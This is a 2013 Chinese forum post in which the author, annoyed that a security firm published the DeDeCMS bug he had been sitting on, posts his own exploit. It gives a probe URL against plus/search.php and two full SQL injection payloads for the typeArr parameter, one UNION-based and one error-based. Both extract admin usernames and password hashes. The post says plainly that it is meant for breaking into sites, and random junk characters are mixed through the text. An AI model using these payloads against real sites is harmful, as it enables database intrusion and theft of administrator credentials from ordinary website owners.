转载不加作者名的没JJ9 ]9 p; x$ v" T) }) {
1 R" E! T( l3 W3 L+ K! T, ^* e
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
# v3 D3 v- n ^6 A* ^9 a1 O: F+ Y' X7 @. r8 ]: G+ A+ \
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。6 Z: X2 w7 n1 M L% \
4 ^2 z, o- O7 z* A2 R我一般是这样测试的:
# L5 Q) Q5 C4 m! k1 x- X* r8 y5 D7 Q2 m7 H1 m6 e& H1 D
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
) Q) E3 |% U/ U& C( j2 i: a# ~0 J& y9 @* A5 O" k; O
转载不加作者名的没JJ
" e1 ?+ J7 ^$ B, S( _7 V0 w, ^( k% Z
( Y) g4 [$ c- o2 Q% n作者:鬼哥
" F3 Q `, ^: ^7 w& ?- ~0 N1 \4 y& y' ?. Y
$ b4 S, K9 z9 r/ x
( k( }+ F( r4 V- i3 S6 q- N看结果如果提示3 A) t i+ R' l. r) {. \
6 v+ q5 b: p9 z8 C4 g1 I" Z& ^Safe Alert: Request Error step 2 !
" L) r) Q7 E D# o0 ~/ V/ o1 q2 C5 R9 O6 p# ]! b% w
那么直接用下面的exp
/ a2 ^0 q h/ k' Q- |6 o7 ^9 ^3 ]2 a0 B, S+ O: i- ]
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
& b& O0 g- j; S. H; J& G/ Q- l
; C" q6 f2 O# W; T$ n
, r9 M1 o- N1 `9 W+ ?2 m看结果如果提示7 p3 f/ y. V C& ^+ Q
2 [' G. o/ k( _Safe Alert: Request Error step 1 !
5 i' r% w/ I/ w/ q( \- o! F8 _7 M6 B& H$ r& [+ b
那么直接用下面的exp6 V2 h$ j2 d( H9 s- F# Y4 [0 x
- q9 x* K* o& I5 }. O& kxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
, h/ P) @ d% N; ^, l7 b% R! I/ h+ Y! M/ p! O$ Q* z! g) V$ k# j
5 ^" F/ y# }" C& d5 r
如果正常显示证明漏洞不存在了。6 T# {7 R1 _/ L, [1 o
5 @) ^ h3 [, Q1 y. ~% Z) B+ t转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对